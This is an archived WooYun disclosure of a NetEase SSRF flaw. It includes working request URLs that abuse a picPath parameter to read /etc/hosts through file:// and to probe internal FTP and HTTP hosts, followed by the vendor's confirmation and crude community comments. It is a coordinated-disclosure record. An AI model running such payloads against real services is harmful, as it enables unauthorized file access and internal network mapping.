当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170154

漏洞标题:网易ssrf可内网拓扑(差点进内网)听说沾沾王子的殺气会怀孕

相关厂商:网易

漏洞作者: Dickeye

提交时间:2016-01-15 16:30

修复时间:2016-03-04 13:27

公开时间:2016-03-04 13:27

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-15: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经确认,细节仅向厂商公开
2016-01-29: 细节向核心白帽子及相关领域专家公开
2016-02-08: 细节向普通白帽子公开
2016-02-18: 细节向实习白帽子公开
2016-03-04: 细节向公众公开

简要描述:

网易某处文件读取可内网拓扑(差点进内网)听说沾沾王子的殺气会怀孕
某处ssrf,曾经提交过的业务,当时只是下线处理,这次居然没修复就又上线了

详细说明:

http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=file://///etc/hosts

屏幕快照 2016-01-15 下午2.28.58.png


可以进行文件读取
当然http,ftp等协议都可以了
内网某处ftp,不过都是前端的咯
http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=ftp://192.168.86.43/inc/

屏幕快照 2016-01-15 下午2.30.55.png


一些内网后台
http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://192.168.86.26

屏幕快照 2016-01-15 下午2.32.30.png


http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://10.100.21.3/message.shtml

屏幕快照 2016-01-15 下午2.33.39.png


http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://192.168.52.111

屏幕快照 2016-01-15 下午2.33.13.png


http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://192.168.86.191
禅道项目
不多弄别的了
附一丁点内网ip信息

内网ip及对应产品副本.png


漏洞证明:

同上

修复方案:

下线吧,如果想用的话,别忘了修复后上线了

版权声明:转载请注明来源 Dickeye@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-19 15:40

厂商回复:

漏洞已确认,我们将尽快修复。感谢您对网易产品的关注!

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-15 16:31 | 陆由乙 ( 普通白帽子 | Rank:445 漏洞数:104 | 我是突突兔!)

    。。。

  2. 2016-01-15 16:48 | 小威 ( 普通白帽子 | Rank:527 漏洞数:85 | 活到老,学到老!)

    杀器王子昨晚好厉害

  3. 2016-01-15 16:50 | Dickeye ( 路人 | Rank:10 漏洞数:1 | 无)

    @小威 肉肉说:杀器王子昨晚好厉害

  4. 2016-01-19 09:50 | saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)

    嗯嗯 宝贝又转战乌云了呀?

  5. 2016-01-21 11:44 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @Dickeye 好厉害!